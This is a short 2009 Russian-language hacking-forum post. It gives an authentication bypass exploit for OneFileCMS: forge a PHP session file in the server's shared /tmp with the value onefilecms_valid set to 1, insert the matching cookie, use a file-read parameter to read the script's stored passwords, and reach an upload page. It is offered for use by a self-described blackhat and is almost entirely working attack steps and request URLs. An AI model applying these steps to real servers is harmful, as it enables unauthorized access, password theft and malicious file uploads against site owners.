24.10.2009, 15:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
OneFileCMS
Обход авторизацаии
На серваке, в общем /tmp
Создаем сесию, например:
sess_blablabla
Код:
onefilecms_valid|s:1:"1";
chmod 777 sess_blablabla
Вставляем куку в браузер:
И используем багу чтобы прочитать пароли:
http://host/onefile/onefilecms.php?f= onefilecms.php
File upload:
http://host/onefile/onefilecms.php?p=upload&i=new/
__________________
BlackHat. MoDL
|
|
|